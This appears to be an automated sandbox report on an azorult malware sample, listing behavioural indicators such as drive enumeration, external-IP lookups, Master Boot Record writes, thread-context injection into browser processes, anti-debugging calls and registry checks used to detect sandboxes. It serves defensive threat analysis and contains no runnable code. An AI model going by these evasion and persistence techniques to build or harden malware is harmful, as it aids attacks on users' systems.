azorult | c59ce6ed0ebcfce3bc9c950ac699944405a6447e40a24697482cf64a0fb37e61

Processes:

md2_2efs.exemd2_2efs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 59 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
787	ipinfo.io
916	ipinfo.io
1036	ipinfo.io
1337	ipinfo.io
331	ipinfo.io
1602	ipinfo.io
1846	ipinfo.io
201	ip-api.com
657	checkip.amazonaws.com
981	ipinfo.io
1894	ipinfo.io
1519	ipinfo.io
1538	ipinfo.io
339	checkip.amazonaws.com
781	ipinfo.io
1056	ip-api.com
1317	ipinfo.io
1963	ipinfo.io
143	ipinfo.io
1409	ipinfo.io
1550	ipinfo.io
1811	ipinfo.io
321	checkip.amazonaws.com
386	ipinfo.io
1120	checkip.amazonaws.com
1977	ipinfo.io
148	ipinfo.io
1027	ipinfo.io
1950	ipinfo.io
1670	ipinfo.io
190	ipinfo.io
687	ipinfo.io
986	ipinfo.io
993	ipinfo.io
1435	ipinfo.io
1520	ipinfo.io
769	ipinfo.io
871	ipinfo.io
881	ipinfo.io
1249	checkip.amazonaws.com
293	ipinfo.io
877	ipinfo.io
320	ipinfo.io
349	ipinfo.io
1461	ipinfo.io
1665	ipinfo.io
1716	ipinfo.io
1897	ipinfo.io
1996	ip-api.com
120	api.ipify.org
152	api.ipify.org
1231	ipinfo.io
1454	ipinfo.io
1444	ipinfo.io
1702	ipinfo.io
375	ipinfo.io
689	ipinfo.io
912	ipinfo.io
1651	ipinfo.io

Maps connected drives based on registry 3 TTPs 4 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exeSetup.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe
File opened for modification	\??\PhysicalDrive0	Setup.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setup.exeSetup.exe

pid process

3748 Setup.exe
2088 Setup.exe

pid	process
3748	Setup.exe
2088	Setup.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

key.exeAD754B4D3FE2C4EE.exeB878.tmp.exeC1FD.tmp.exe

description	pid	process	target process
PID 4640 set thread context of 3608	4640	key.exe	key.exe
PID 2020 set thread context of 4548	2020	AD754B4D3FE2C4EE.exe	zznote.exe
PID 2020 set thread context of 4388	2020	AD754B4D3FE2C4EE.exe	firefox.exe
PID 2020 set thread context of 184	2020	AD754B4D3FE2C4EE.exe	firefox.exe
PID 3868 set thread context of 2360	3868	B878.tmp.exe	B878.tmp.exe
PID 420 set thread context of 5352	420	C1FD.tmp.exe	C1FD.tmp.exe

Drops file in Program Files directory 64 IoCs

Processes:

vpn.tmpchashepro3.tmpmsiexec.exe0dt4gss5ysq.exeIBInstaller_97039.tmpchashepro3.tmpvict.tmpjyqsk3wxebw.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-27N09.tmp	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\is-AHU97.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9T943.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-NNFMR.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-BQ1O7.tmp	vpn.tmp
File created	C:\Program Files (x86)\gdiview\gdiview\GDIView.chm	msiexec.exe
File opened for modification	C:\Program Files (x86)\JCleaner\mex.exe	chashepro3.tmp
File created	C:\Program Files\WPYV7RTWDJ\WPYV7RTWD.exe	0dt4gss5ysq.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-3DHCP.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2E7L5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-SLDUN.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File created	C:\Program Files (x86)\JCleaner\is-KI379.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-L7MQT.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-BCI4V.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Brava.exe	chashepro3.tmp
File created	C:\Program Files (x86)\gdiview\gdiview\readme.txt	msiexec.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-S92J6.tmp	IBInstaller_97039.tmp
File created	C:\Program Files\WPYV7RTWDJ\WPYV7RTWD.exe.config	0dt4gss5ysq.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-65UFT.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File created	C:\Program Files (x86)\gdiview\gdiview\GDIView.exe	msiexec.exe
File created	C:\Program Files (x86)\viewerise\is-7D14G.tmp	vict.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-24O25.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-7ADSN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-BBG5Q.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	jyqsk3wxebw.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	jyqsk3wxebw.tmp
File created	C:\Program Files (x86)\viewerise\is-J4SNL.tmp	jyqsk3wxebw.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-JJNRM.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-NIQIO.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-T6G98.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-NPTQL.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-NJK3I.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-PKV7C.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-J3P32.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-0N5VI.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-BTF9T.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Brava.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll	IBInstaller_97039.tmp

Drops file in Windows directory 18 IoCs

Processes:

FakeClient.exemultitimer.exemsiexec.exeFakeClient.exeFakeClient.exesrtasks.exe

description	ioc	process
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Installer\f7ebb85.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC345.tmp	msiexec.exe
File created	C:\Windows\Installer\f7ebb87.msi	msiexec.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	srtasks.exe
File opened for modification	C:\Windows\Installer\f7ebb85.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{9A2A452C-3057-4F5E-8C7F-41B0D566B831}	msiexec.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	srtasks.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

8996 20328 WerFault.exe 1461074104.exe
9656 12652 WerFault.exe MicrosoftEdgeCP.exe

pid	pid_target	process	target process
8996	20328	WerFault.exe	1461074104.exe
9656	12652	WerFault.exe	MicrosoftEdgeCP.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

svchost.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	AD754B4D3FE2C4EE.exe
